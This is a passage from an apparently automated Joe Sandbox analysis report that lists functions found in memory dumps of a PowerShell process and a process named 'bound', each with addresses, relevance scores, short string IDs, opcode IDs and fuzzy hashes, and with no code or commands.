                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 58b30047d7e44f079066e9e7afbe79efcaf13536441b5f12f160c6d55ce256cb
                                                                                                                                                                                                                              • Instruction ID: 38cb8282c5407151de2201f6d04f3ee483cc720ff9c0ee405698968afa7c8e50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b30047d7e44f079066e9e7afbe79efcaf13536441b5f12f160c6d55ce256cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56F0373275C6044FDB4CAA1CF8529B573D1E799320B10016EE48BC2696D917F842C685

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00007FF886768BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                                                                                                                                              • API String ID: 0-1500707516
                                                                                                                                                                                                                              • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                                                                              • Instruction ID: a2d9ee7be2281fb38b7a3aa5b14e395de017defeb1d529274164f6058e48bbdc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 652105777084669ED30276ADB864ADC7380DBA46B638A47B3E258CF543FD18A08786D1
                                                                                                                                                                                                                              Function 00007FF8867686FA Relevance: 6.3, Strings: 5, Instructions: 90COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                                                                              • API String ID: 0-679677686
                                                                                                                                                                                                                              • Opcode ID: 6578915fc91fb94ecd6f914bb74461aeb77435cbfe520801d496b6ecb692bb83
                                                                                                                                                                                                                              • Instruction ID: cd6f54e4b311aa8f9029391a3f116ba66bb9897c124efd1fc38fc1f7869a6a93
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6578915fc91fb94ecd6f914bb74461aeb77435cbfe520801d496b6ecb692bb83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A53172A3A0E6D59FE717566848B90D53FD0FF12258B0E02F6C8D88F1A3FD58290AC291
                                                                                                                                                                                                                              Function 00007FF886768955 Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                                                                                              • API String ID: 0-1397233021
                                                                                                                                                                                                                              • Opcode ID: 5ce95b20ca1fda97b254bb0081d972034d579d739c8b849da8a4253fac1cb583
                                                                                                                                                                                                                              • Instruction ID: dfa932f377910ad4e41640966d2dfd512709635714ddbf1b3a5bfc079146dbf2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ce95b20ca1fda97b254bb0081d972034d579d739c8b849da8a4253fac1cb583
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55417396A0E6D25FF35752284879195BFA0FF52258B4D03F6C4C88F0E3FD592847D2A2

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FF88676A7D2 Relevance: 5.6, Strings: 4, Instructions: 554COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: }f$8hf$vX_H$yX_H
                                                                                                                                                                                                                              • API String ID: 0-1268338001
                                                                                                                                                                                                                              • Opcode ID: fe4a78b987730ad11f56939d775cd190225a535ca8bc2e134aa93bbae7dea302
                                                                                                                                                                                                                              • Instruction ID: 14bf443520310830fbd92e29abb061ba91c123365dd0fddcccf3c8fbc99fce30
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe4a78b987730ad11f56939d775cd190225a535ca8bc2e134aa93bbae7dea302
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A12EF71D1895D8BEBA8EB58D8A97A9B3F1FB58750F1002F5D00DD3292DE346D82CB41
                                                                                                                                                                                                                              Function 00007FF88677B784 Relevance: 2.8, Strings: 2, Instructions: 303COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: b4d$b4d
                                                                                                                                                                                                                              • API String ID: 0-1613134983
                                                                                                                                                                                                                              • Opcode ID: f61792fd54b31067f98ab1a21e1a8fcbbaa474850444b06dfe35265b722eb97b
                                                                                                                                                                                                                              • Instruction ID: e508413ec08ab4a2dc11158b492e98e2ecd2ae1de289f152aac5f8d370e2e740
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f61792fd54b31067f98ab1a21e1a8fcbbaa474850444b06dfe35265b722eb97b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD914431A18B4A8FD358EE2894A55B573D2FFA5760B14477ED08AC3282DE28FC42C781
                                                                                                                                                                                                                              Function 00007FF8867647C8 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: `on
                                                                                                                                                                                                                              • API String ID: 0-228467854
                                                                                                                                                                                                                              • Opcode ID: 9cf60d12839c69bd4d69e11eda310a2974f66f3d2c6d65140ce1441146c27ccb
                                                                                                                                                                                                                              • Instruction ID: 07810de896be061995f4160afec57a0dca8e049756b36dd5722013bc17bb4c1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf60d12839c69bd4d69e11eda310a2974f66f3d2c6d65140ce1441146c27ccb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E611130609A454FD758EB28C4A5AB6B7E1FF99350F20467ED04AC7292EE24FC46CBC1
                                                                                                                                                                                                                              Function 00007FF886770FE6 Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 03c2afbf5fb8a72f5e1827540af886ca90128fac0de00d6260b077838e33252d
                                                                                                                                                                                                                              • Instruction ID: 90dc0af8004e1894621f92f4beda2e8ad33744eaf3f36fda70f2bef545f493da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c2afbf5fb8a72f5e1827540af886ca90128fac0de00d6260b077838e33252d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23C12821E1DACA4FE795EB6854756B83BD1FF9A2A4B0C02B9D44DC72D3DE189C02C381
                                                                                                                                                                                                                              Function 00007FF886766FE0 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 682b2da0faad58eb030bfc1284b6061860caf98a6c44dfa60e58280ddde27eac
                                                                                                                                                                                                                              • Instruction ID: b453796c73648713b8cbd5dc1fa130bc1026c767ee92292b388cca26a74db9e9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 682b2da0faad58eb030bfc1284b6061860caf98a6c44dfa60e58280ddde27eac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E819D6190EBC64FD3579B3848749A17FB0AF5729071D46EBC4D8CB1E3DA1CA80AC762
                                                                                                                                                                                                                              Function 00007FF886769785 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 29ed690d087fa8024a7b501175555f4d29670074966a09a7affbb6d2ab789364
                                                                                                                                                                                                                              • Instruction ID: 9f96298684951f9ff01f4f59df033348b99bce97df4fda54470d4669dec59836
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29ed690d087fa8024a7b501175555f4d29670074966a09a7affbb6d2ab789364
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D610931B0DA0A0FE794F56C68A66B537D1FF963A0B0402BAD54EC3197ED15FC528780
                                                                                                                                                                                                                              Function 00007FF88676BF7D Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 60ec4055a88ff549038082c661f61b109c0763dbfb9551c3d50cd44c50686800
                                                                                                                                                                                                                              • Instruction ID: b0281a7495afbf1a73818942785d5f8f4752a7ca6ad313c8d4a157a7bc80d138
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60ec4055a88ff549038082c661f61b109c0763dbfb9551c3d50cd44c50686800
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6112B6151E7851FE762B3789C966B27FD4EF4729070A01FBE48DC70A3D8086C82C3A1
                                                                                                                                                                                                                              Function 00007FF88676D79D Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70bef11384e0796c46f96028142052cc48235c69dbf4d3d7c1ac5f7d9fb10a85
                                                                                                                                                                                                                              • Instruction ID: e1cc406d0774f8df0941869906a8dc5171fc196f5e234f9ada0e82fb6f8caeb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70bef11384e0796c46f96028142052cc48235c69dbf4d3d7c1ac5f7d9fb10a85
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF04421A1CA880AE756B33C54647B63BE0EF8A340F0803BBC48DC2187DC582C46C382
                                                                                                                                                                                                                              Function 00007FF88676DF92 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1612635665.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff886760000_bound.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ebf93277d84c91526b0bf2c57ed57c7318af8d061e4beb8b968988a1ad9bb15a
                                                                                                                                                                                                                              • Instruction ID: 54b9de906897a024489f04b6921386811873a875854ceacd76005e141f06a4a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebf93277d84c91526b0bf2c57ed57c7318af8d061e4beb8b968988a1ad9bb15a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF0824041E7C41FEB579BB8086A6A67FE1AE5B150B4D86FBC5C8CF0A3D51C544EC362